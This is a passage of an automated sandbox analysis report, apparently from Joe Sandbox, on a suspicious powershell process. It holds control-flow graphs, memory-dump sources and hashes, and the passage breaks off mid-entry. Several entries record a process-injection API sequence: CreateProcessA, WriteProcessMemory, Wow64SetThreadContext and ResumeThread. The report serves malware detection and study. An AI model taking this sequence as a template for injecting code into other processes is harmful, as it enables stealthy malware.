11904->11905 11906 1020d50 11905->11906 11907 1022930 2 API calls 11905->11907 11908 1022928 2 API calls 11905->11908 11906->11858 11907->11906 11908->11906 11910 1021c3a 11909->11910 11912 1022980 ResumeThread 11910->11912 11913 1022988 ResumeThread 11910->11913 11911 1020d50 11912->11911 11913->11911 11915 1021350 11914->11915 11916 1020d50 11915->11916 11917 1022980 ResumeThread 11915->11917 11918 1022988 ResumeThread 11915->11918 11917->11916 11918->11916 11920 1020697 CreateProcessA 11919->11920 11922 10208f4 11920->11922 11924 1020697 CreateProcessA 11923->11924 11926 10208f4 11924->11926 11928 1022988 11927->11928 11935 26fe68 11928->11935 11932 102299d 11931->11932 11934 26fe68 ResumeThread 11932->11934 11933 10229ba 11933->11878 11934->11933 11936 26feac ResumeThread 11935->11936 11938 26fef8 11936->11938 11938->11878 11940 10202d4 WriteProcessMemory 11939->11940 11942 102036d 11940->11942 11944 1022945 11943->11944 11953 1020040 11944->11953 11957 1020038 11944->11957 11945 1022965 11945->11892 11949 1022930 11948->11949 11951 1020040 Wow64SetThreadContext 11949->11951 11952 1020038 Wow64SetThreadContext 11949->11952 11950 1022965 11950->11892 11951->11950 11952->11950 11954 1020089 Wow64SetThreadContext 11953->11954 11956 1020101 11954->11956 11956->11945 11958 1020089 Wow64SetThreadContext 11957->11958 11960 1020101 11958->11960 11960->11945

                          Executed Functions

                          Function 00265F08 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 345 265f08-265f3e 347 265f45-265f7c 345->347 348 265f40 345->348 351 265f7f-265f85 347->351 348->347 352 265f87 351->352 353 265f8e-265f8f 351->353 354 266136-266150 352->354 355 265f94-265fc9 352->355 356 266155-26615d 352->356 357 265fd5-266018 352->357 358 266062-2660da 352->358 359 266040-266043 352->359 360 266160-266161 352->360 361 2660ed-266108 352->361 362 26610d-266131 call 264f8c 352->362 363 26624b-266266 352->363 364 266029-26602d 352->364 365 266179-2661f8 352->365 353->355 353->356 354->351 355->351 384 265fcb-265fd3 355->384 357->351 388 26601e-266024 357->388 358->351 391 2660e0-2660e8 358->391 372 26604c-26605d 359->372 366 266162-266174 360->366 361->351 362->351 363->351 364->366 367 266033-26603b 364->367 393 266201-266207 365->393 366->351 367->351 372->351 384->351 388->351 391->351 394 266210-26623a 393->394 394->351 396 266240-266246 394->396 396->351
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: SjP
                          • API String ID: 0-1466192239
                          • Opcode ID: b6d98e22abf4b9a4b23826aba03269595e02b1b5bffd0300bac80cf7ed7c988e
                          • Instruction ID: 8edc9bbb5195cd56085c8620756b88896ba6701ed011757d36f19d701ae5c491
                          • Opcode Fuzzy Hash: b6d98e22abf4b9a4b23826aba03269595e02b1b5bffd0300bac80cf7ed7c988e
                          • Instruction Fuzzy Hash: 59A13E74E15218CFDB44DFA4E8486AEBBF1FF99300F20802AE905A77A5DB745995CF40
                          Function 00265F18 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 397 265f18-265f3e 398 265f45-265f7c 397->398 399 265f40 397->399 402 265f7f-265f85 398->402 399->398 403 265f87 402->403 404 265f8e-265f8f 402->404 405 266136-266150 403->405 406 265f94-265fc9 403->406 407 266155-26615d 403->407 408 265fd5-266018 403->408 409 266062-2660da 403->409 410 266040-266043 403->410 411 266160-266161 403->411 412 2660ed-266108 403->412 413 26610d-266131 call 264f8c 403->413 414 26624b-266266 403->414 415 266029-26602d 403->415 416 266179-266207 403->416 404->406 404->407 405->402 406->402 435 265fcb-265fd3 406->435 408->402 439 26601e-266024 408->439 409->402 442 2660e0-2660e8 409->442 423 26604c-26605d 410->423 417 266162-266174 411->417 412->402 413->402 414->402 415->417 418 266033-26603b 415->418 445 266210-26623a 416->445 417->402 418->402 423->402 435->402 439->402 442->402 445->402 447 266240-266246 445->447 447->402
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: SjP
                          • API String ID: 0-1466192239
                          • Opcode ID: 24f7125c903361211748e9f4ffb5e9e1846ca83fa3d6011a3d755a359ab55b59
                          • Instruction ID: 297dcfe44674092a5e8ed7f879a1f7987350954133e1b7fc69dfd3a3a3ebfb05
                          • Opcode Fuzzy Hash: 24f7125c903361211748e9f4ffb5e9e1846ca83fa3d6011a3d755a359ab55b59
                          • Instruction Fuzzy Hash: 4DA11074E15218CFDB44DFA4E8486AEBBF1FF99300F208029E905A77A5DB745995CF40
                          Function 0026EFB8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 448 26efb8-26efd8 449 26efdf-26efec 448->449 450 26efda 448->450 451 26efee-26eff1 449->451 450->449 452 26eff4-26effa 451->452 453 26f003-26f004 452->453 454 26effc 452->454 455 26f137-26f189 453->455 454->453 454->455 456 26f0a7-26f124 call 268c18 454->456 457 26f25e-26f27a call 26eb88 454->457 458 26f1b9-26f24b 454->458 459 26f009-26f094 call 268c18 * 2 454->459 476 26f195-26f1b4 455->476 456->452 482 26f12a-26f132 456->482 457->452 469 26f280-26f286 457->469 458->452 483 26f251-26f259 458->483 459->452 484 26f09a-26f0a2 459->484 469->452 476->451 482->452 483->452 484->452
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: E>I
                          • API String ID: 0-3352654960
                          • Opcode ID: cc4f4a1c0364068f24d0186fa4e72b76474a4e0898190163e22ccbd6384320a4
                          • Instruction ID: 61dc12acedd70eed269c9e198ba6ef7b570bbfa4b2ea545773f868682a69fd04
                          • Opcode Fuzzy Hash: cc4f4a1c0364068f24d0186fa4e72b76474a4e0898190163e22ccbd6384320a4
                          • Instruction Fuzzy Hash: 14713A38A14208CFDB54DF68D894BADBBF1BB49300F51C4AAD40AA7395DB749E85CF01
                          Function 01020605 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 342processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1020605-10206a9 2 10206f2-102071a 0->2 3 10206ab-10206c2 0->3 7 1020760-10207b6 2->7 8 102071c-1020730 2->8 3->2 6 10206c4-10206c9 3->6 9 10206cb-10206d5 6->9 10 10206ec-10206ef 6->10 16 10207b8-10207cc 7->16 17 10207fc-10208f2 CreateProcessA 7->17 8->7 18 1020732-1020737 8->18 11 10206d7 9->11 12 10206d9-10206e8 9->12 10->2 11->12 12->12 15 10206ea 12->15 15->10 16->17 26 10207ce-10207d3 16->26 36 10208f4-10208fa 17->36 37 10208fb-10209e4 17->37 19 102075a-102075d 18->19 20 1020739-1020743 18->20 19->7 23 1020747-1020756 20->23 24 1020745 20->24 23->23 25 1020758 23->25 24->23 25->19 28 10207f6-10207f9 26->28 29 10207d5-10207df 26->29 28->17 30 10207e3-10207f2 29->30 31 10207e1 29->31 30->30 33 10207f4 30->33 31->30 33->28 36->37 48 10209e6-10209ea 37->48 49 10209f4-10209f8 37->49 48->49 52 10209ec 48->52 50 10209fa-10209fe 49->50 51 1020a08-1020a0c 49->51 50->51 53 1020a00 50->53 54 1020a0e-1020a12 51->54 55 1020a1c-1020a20 51->55 52->49 53->51 54->55 58 1020a14 54->58 56 1020a22-1020a4b 55->56 57 1020a56-1020a61 55->57 56->57 62 1020a62 57->62 58->55 62->62
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 010208DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID: 0($0($0(
                          • API String ID: 963392458-1909826909
                          • Opcode ID: 9fde6965dc503d15ec7a2ff4d0a6138df2b1fff262d014aaabf75186e1cb8360
                          • Instruction ID: 85809c9e3a061a3e4db5332719b6cb4c60b275caa473cbdb5ba57b2237f5185e
                          • Opcode Fuzzy Hash: 9fde6965dc503d15ec7a2ff4d0a6138df2b1fff262d014aaabf75186e1cb8360
                          • Instruction Fuzzy Hash: C1C11671D002298FDB25CFA8C8447EEBBF1BF49300F0491A9E859B7254DB749A85CF85
                          Function 01020610 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 337processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 63 1020610-10206a9 65 10206f2-102071a 63->65 66 10206ab-10206c2 63->66 70 1020760-10207b6 65->70 71 102071c-1020730 65->71 66->65 69 10206c4-10206c9 66->69 72 10206cb-10206d5 69->72 73 10206ec-10206ef 69->73 79 10207b8-10207cc 70->79 80 10207fc-10208f2 CreateProcessA 70->80 71->70 81 1020732-1020737 71->81 74 10206d7 72->74 75 10206d9-10206e8 72->75 73->65 74->75 75->75 78 10206ea 75->78 78->73 79->80 89 10207ce-10207d3 79->89 99 10208f4-10208fa 80->99 100 10208fb-10209e4 80->100 82 102075a-102075d 81->82 83 1020739-1020743 81->83 82->70 86 1020747-1020756 83->86 87 1020745 83->87 86->86 88 1020758 86->88 87->86 88->82 91 10207f6-10207f9 89->91 92 10207d5-10207df 89->92 91->80 93 10207e3-10207f2 92->93 94 10207e1 92->94 93->93 96 10207f4 93->96 94->93 96->91 99->100 111 10209e6-10209ea 100->111 112 10209f4-10209f8 100->112 111->112 115 10209ec 111->115 113 10209fa-10209fe 112->113 114 1020a08-1020a0c 112->114 113->114 116 1020a00 113->116 117 1020a0e-1020a12 114->117 118 1020a1c-1020a20 114->118 115->112 116->114 117->118 121 1020a14 117->121 119 1020a22-1020a4b 118->119 120 1020a56-1020a61 118->120 119->120 125 1020a62 120->125 121->118 125->125
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 010208DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID: 0($0($0(
                          • API String ID: 963392458-1909826909
                          • Opcode ID: ca817d2be4a47abd33a4ad6cd9c90fba06cf2387fa61084ac550918b679cf656
                          • Instruction ID: 3452511bdced58bd22e445008f67409e425fd8239ab828a6c99f8f0a92b9fda1
                          • Opcode Fuzzy Hash: ca817d2be4a47abd33a4ad6cd9c90fba06cf2387fa61084ac550918b679cf656
                          • Instruction Fuzzy Hash: 96C11771D002298FDB25CFA8C8447EEBBF1BF49300F0491A9E959B7254DB749A85CF85
                          Function 004209E5 Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 126 4209e5-4209e8 127 4209ea-4209ec 126->127 128 4209ee-4209f6 126->128 127->128 129 4209f8-4209fe 128->129 130 420a0e-420a12 128->130 131 420a02-420a0c 129->131 132 420a00 129->132 133 420b73-420b7d 130->133 134 420a18-420a1c 130->134 131->130 132->130 135 420b8b-420b91 133->135 136 420b7f-420b88 133->136 137 420a1e-420a2d 134->137 138 420a2f 134->138 140 420b93-420b95 135->140 141 420b97-420ba3 135->141 142 420a31-420a33 137->142 138->142 143 420ba5-420bc3 140->143 141->143 142->133 144 420a39-420a59 142->144 150 420a5b-420a76 144->150 151 420a78 144->151 152 420a7a-420a7c 150->152 151->152 152->133 154 420a82-420a84 152->154 155 420a86-420a92 154->155 156 420a94 154->156 158 420a96-420a98 155->158 156->158 158->133 159 420a9e-420abe 158->159 162 420ac0-420ac6 159->162 163 420ad6-420ada 159->163 164 420aca-420acc 162->164 165 420ac8 162->165 166 420af4-420af8 163->166 167 420adc-420ae2 163->167 164->163 165->163 170 420aff-420b01 166->170 168 420ae6-420af2 167->168 169 420ae4 167->169 168->166 169->166 171 420b03-420b09 170->171 172 420b19-420b70 170->172 174 420b0b 171->174 175 420b0d-420b0f 171->175 174->172 175->172
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p$$p$$p$$p
                          • API String ID: 0-2334450948
                          • Opcode ID: c52ae13f865b2860d7c35816e485296453d55aaebb36239edb376710bbdb5b90
                          • Instruction ID: a8e07a1e7fea18157439f4f72b60eb26255bce726624556f6708740fc2608a95
                          • Opcode Fuzzy Hash: c52ae13f865b2860d7c35816e485296453d55aaebb36239edb376710bbdb5b90
                          • Instruction Fuzzy Hash: 8741E4317003258FDB285AB8B41067BBBE2AFD0314BE4846BD4418B392DF79DD41C75A
                          Function 00422808 Relevance: 5.3, Strings: 4, Instructions: 254COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 177 422808-42281a 178 422820-422825 177->178 179 422949-422982 177->179 180 422827-42282d 178->180 181 42283d-42284a 178->181 188 422a42-422a48 179->188 189 422988-422999 179->189 182 422831-42283b 180->182 183 42282f 180->183 181->179 184 422850-422857 181->184 182->181 183->181 186 422859-42285f 184->186 187 42286f-42287e 184->187 191 422863-422865 186->191 192 422861 186->192 187->179 193 422884-42288b 187->193 200 422aa6-422abc 188->200 201 422a4a-422aa4 188->201 198 4229b3-4229d0 189->198 199 42299b-4229a1 189->199 191->187 192->187 195 4228a3-4228bc 193->195 196 42288d-422893 193->196 195->179 208 4228c2-4228c7 195->208 202 422897-422899 196->202 203 422895 196->203 198->188 216 4229d2-4229f4 198->216 204 4229a3 199->204 205 4229a5-4229b1 199->205 211 422ae9-422aee 200->211 212 422abe-422acc 200->212 201->200 202->195 203->195 204->198 205->198 214 4228c9-4228cf 208->214 215 4228df-4228f8 208->215 211->212 228 422ad4-422ae3 212->228 217 4228d3-4228dd 214->217 218 4228d1 214->218 244 4228fb call 262f80 215->244 245 4228fb call 2632aa 215->245 246 4228fb call 263199 215->246 225 4229f6-4229fc 216->225 226 422a0e-422a26 216->226 217->215 218->215 229 422a00-422a0c 225->229 230 4229fe 225->230 236 422a34-422a3f 226->236 237 422a28-422a2a 226->237 228->211 229->226 230->226 231 4228fd-422906 231->179 233 422908-42290d 231->233 234 422925-42293c 233->234 235 42290f-422915 233->235 243 422941-422948 234->243 239 422917 235->239 240 422919-422923 235->240 237->236 239->234 240->234 244->231 245->231 246->231
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @X$@X$tPp$tPp
                          • API String ID: 0-25804276
                          • Opcode ID: 9753b0bd03a53d680de108f20594c30cbcddfe7373d2a69c4ea34355aee4f64a
                          • Instruction ID: 0a86840561b857d5d40e9503de7ac2b9444754ce05e290eff31f4528d051a664
                          • Opcode Fuzzy Hash: 9753b0bd03a53d680de108f20594c30cbcddfe7373d2a69c4ea34355aee4f64a
                          • Instruction Fuzzy Hash: 78910530B04350AFC724DB68D951A2ABBF2EF86310F6881ABD4459F392CAB5DC42C755
                          Function 004212B1 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 247 4212b1-4212b5 249 4212b7-4212d9 247->249 250 421328-42132d 247->250 251 421345-421349 250->251 252 42132f-421335 250->252 256 421474-42147e 251->256 257 42134f-421353 251->257 254 421337 252->254 255 421339-421343 252->255 254->251 255->251 258 421480-421489 256->258 259 42148c-421492 256->259 260 421393 257->260 261 421355-421366 257->261 265 421494-421496 259->265 266 421498-4214a4 259->266 263 421395-421397 260->263 272 4214cc-4214d1 261->272 273 42136c-421371 261->273 263->256 267 42139d-4213a1 263->267 269 4214a6-4214c9 265->269 266->269 267->256 271 4213a7-4213ab 267->271 271->256 277 4213b1-4213d7 271->277 274 421373-421379 273->274 275 421389-421391 273->275 278 42137b 274->278 279 42137d-421387 274->279 275->263 277->256 285 4213dd-4213e1 277->285 278->275 279->275 286 4213e3-4213ec 285->286 287 421404 285->287 288 4213f3-421400 286->288 289 4213ee-4213f1 286->289 290 421407-421414 287->290 291 421402 288->291 289->291 293 42141a-421471 290->293 291->290
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (op$(op
                          • API String ID: 0-3902484270
                          • Opcode ID: ca6814192dd68261e65dedd9a7d09c72c061583328bc7f9cabeb52d3f3934df0
                          • Instruction ID: 2ed93d3509689484cbbdb1546a3888df0ad7a4ebdee8f7f47648e4a088e68599
                          • Opcode Fuzzy Hash: ca6814192dd68261e65dedd9a7d09c72c061583328bc7f9cabeb52d3f3934df0
                          • Instruction Fuzzy Hash: 8241E131B00214DFDB189E68E844BAFB7A2AB94311FA4C46BE9158B2A1CB35CD52CB45
                          Function 00420E5F Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 295 420e5f-420e77 297 420e7e-420e80 295->297 298 420e82-420e88 297->298 299 420e98-420eef 297->299 301 420e8a 298->301 302 420e8c-420e8e 298->302 301->299 302->299
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p
                          • API String ID: 0-3973980265
                          • Opcode ID: 3928480158e4aaa87c5a08389d3023111836b1c3726ec91bd6b87f2c8c828fc2
                          • Instruction ID: f01de772f0ba7f06973d54f4d46685db3509bd2a3795e75c52146a2186838a65
                          • Opcode Fuzzy Hash: 3928480158e4aaa87c5a08389d3023111836b1c3726ec91bd6b87f2c8c828fc2
                          • Instruction Fuzzy Hash: 1AE068327043048ACB586664E0203ADBBA1AFC2220FA5849BC4808321BCA38CC46C357
                          Function 01020288 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 303 1020288-10202f3 305 10202f5-1020307 303->305 306 102030a-102036b WriteProcessMemory 303->306 305->306 308 1020374-10203c6 306->308 309 102036d-1020373 306->309 309->308
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0102035B
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 3e62486824d8c2b2353b8d8e58baef6f6d93b2536ddd0de0c36eed7e31dc4924
                          • Instruction ID: 6df8765c2fe50f91f5f4b6095bb7decf776bb7419cb35a9297953e6791489941
                          • Opcode Fuzzy Hash: 3e62486824d8c2b2353b8d8e58baef6f6d93b2536ddd0de0c36eed7e31dc4924
                          • Instruction Fuzzy Hash: 7541AAB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE818B7254D334AA45CF64
                          Function 01020038 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 314 1020038-10200a0 316 10200a2-10200b4 314->316 317 10200b7-10200ff Wow64SetThreadContext 314->317 316->317 319 1020101-1020107 317->319 320 1020108-1020154 317->320 319->320
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 010200EF
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 25b4ba795b728a6b27b2329d63f3667a39adb24c335d6deeb89cea8311022242
                          • Instruction ID: 9411cd438c3e3c9bcc75b04db23f3a6969b27b917e71fd96a9a25269112413d6
                          • Opcode Fuzzy Hash: 25b4ba795b728a6b27b2329d63f3667a39adb24c335d6deeb89cea8311022242
                          • Instruction Fuzzy Hash: 1F41CDB4D002589FDB14CFAAD884AEEFBF1BF49314F24842AE444B7254C739A985CF54
                          Function 01020040 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 325 1020040-10200a0 327 10200a2-10200b4 325->327 328 10200b7-10200ff Wow64SetThreadContext 325->328 327->328 330 1020101-1020107 328->330 331 1020108-1020154 328->331 330->331
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 010200EF
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 7031e0f26f48ce354e050b0be7d79b0c641e2f8e758122fa1ead8d9c34c63979
                          • Instruction ID: f1ec93902ed5c5b28793680b80601fce508b445c06ed30c5aac9be7badb76a3c
                          • Opcode Fuzzy Hash: 7031e0f26f48ce354e050b0be7d79b0c641e2f8e758122fa1ead8d9c34c63979
                          • Instruction Fuzzy Hash: AB31BEB4D002589FDB14CFAAD984AEEFFF1AF49314F24802AE454B7244C738A945CF54
                          Function 0026FE68 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 336 26fe68-26fef6 ResumeThread 339 26feff-26ff41 336->339 340 26fef8-26fefe 336->340 340->339
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 0026FEE6
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 353923a5acf66a4c1b1f45b85a6930bfaa729bc48c0b9bae9f85fdebe27ed86d
                          • Instruction ID: 39ed3cf6113faccf368a7a3c84df590165c29a3b648622816d86d33bf822ac86
                          • Opcode Fuzzy Hash: 353923a5acf66a4c1b1f45b85a6930bfaa729bc48c0b9bae9f85fdebe27ed86d
                          • Instruction Fuzzy Hash: AB31EEB4D102089FCF14CFAAE984AEEFBB5AF49310F20942AE814B7310C735A945CF94
                          Function 004227E7 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 485 4227e7-42281a 487 422820-422825 485->487 488 422949-422982 485->488 489 422827-42282d 487->489 490 42283d-42284a 487->490 497 422a42-422a48 488->497 498 422988-422999 488->498 491 422831-42283b 489->491 492 42282f 489->492 490->488 493 422850-422857 490->493 491->490 492->490 495 422859-42285f 493->495 496 42286f-42287e 493->496 500 422863-422865 495->500 501 422861 495->501 496->488 502 422884-42288b 496->502 509 422aa6-422abc 497->509 510 422a4a-422aa4 497->510 507 4229b3-4229d0 498->507 508 42299b-4229a1 498->508 500->496 501->496 504 4228a3-4228bc 502->504 505 42288d-422893 502->505 504->488 517 4228c2-4228c7 504->517 511 422897-422899 505->511 512 422895 505->512 507->497 525 4229d2-4229f4 507->525 513 4229a3 508->513 514 4229a5-4229b1 508->514 520 422ae9-422aee 509->520 521 422abe-422acc 509->521 510->509 511->504 512->504 513->507 514->507 523 4228c9-4228cf 517->523 524 4228df-4228f8 517->524 520->521 537 422ad4-422ae3 521->537 526 4228d3-4228dd 523->526 527 4228d1 523->527 553 4228fb call 262f80 524->553 554 4228fb call 2632aa 524->554 555 4228fb call 263199 524->555 534 4229f6-4229fc 525->534 535 422a0e-422a26 525->535 526->524 527->524 538 422a00-422a0c 534->538 539 4229fe 534->539 545 422a34-422a3f 535->545 546 422a28-422a2a 535->546 537->520 538->535 539->535 540 4228fd-422906 540->488 542 422908-42290d 540->542 543 422925-42293c 542->543 544 42290f-422915 542->544 552 422941-422948 543->552 548 422917 544->548 549 422919-422923 544->549 546->545 548->543 549->543 553->540 554->540 555->540
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @X
                          • API String ID: 0-3831194306
                          • Opcode ID: 582ad2c14a40ffea8a13758bd52b5a7b81503d209567902bc6756082d4068242
                          • Instruction ID: 8136d52a5a1f6f0b612a35c5d21704983ecbc44e82cd88ba5fd9eae7584beecd
                          • Opcode Fuzzy Hash: 582ad2c14a40ffea8a13758bd52b5a7b81503d209567902bc6756082d4068242
                          • Instruction Fuzzy Hash: ED41AE74B04210EFD721DB59DA90926FBB2EF86310B59C1ABD4098F352CBB6EC42CB55
                          Function 00422A54 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba239c0eea5db91ec842322e84d780e22abc64b8460c9f4bb28d32a770a0a2d3
                          • Instruction ID: 5f4ee57833eed029ad98ce1b118498603a6ddf01eed6c23d9f9e314f6d3285e3
                          • Opcode Fuzzy Hash: ba239c0eea5db91ec842322e84d780e22abc64b8460c9f4bb28d32a770a0a2d3
                          • Instruction Fuzzy Hash: 8E0145203143842FCB2157744C65B7E2FA68F86701F94445BF845DF3C3C8B49C49832A
                          Function 0016D01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.382363314.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_16d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b9a60ac63fc1dbd71d7d8be6c08855f7cccddb946315f20619b3b1da85f132ec
                          • Instruction ID: 139eaac3527efd899212a81180a54f152d0cda17a8112a0cbad721b4fa96ba86
                          • Opcode Fuzzy Hash: b9a60ac63fc1dbd71d7d8be6c08855f7cccddb946315f20619b3b1da85f132ec
                          • Instruction Fuzzy Hash: F501A771A04380AAE7254E15ECC4B77BFD8DF41724F29C51AFC454B286C779D845C6B1
                          Function 0016D006 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.382363314.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_16d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48a83b039642342d5438a11c3aee39cec5e658a52674c806aabf6ed395eee5f4
                          • Instruction ID: df620918fe242038493490806f7ec92bb0ef130ca5958a7abf3a87ca21408c23
                          • Opcode Fuzzy Hash: 48a83b039642342d5438a11c3aee39cec5e658a52674c806aabf6ed395eee5f4
                          • Instruction Fuzzy Hash: A5010C6150D3C09FD7128B259C94B66BFB4DF53624F1E81DBE8888F2A7C2699C48C772

                          Non-executed Functions

                          Function 00268960 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
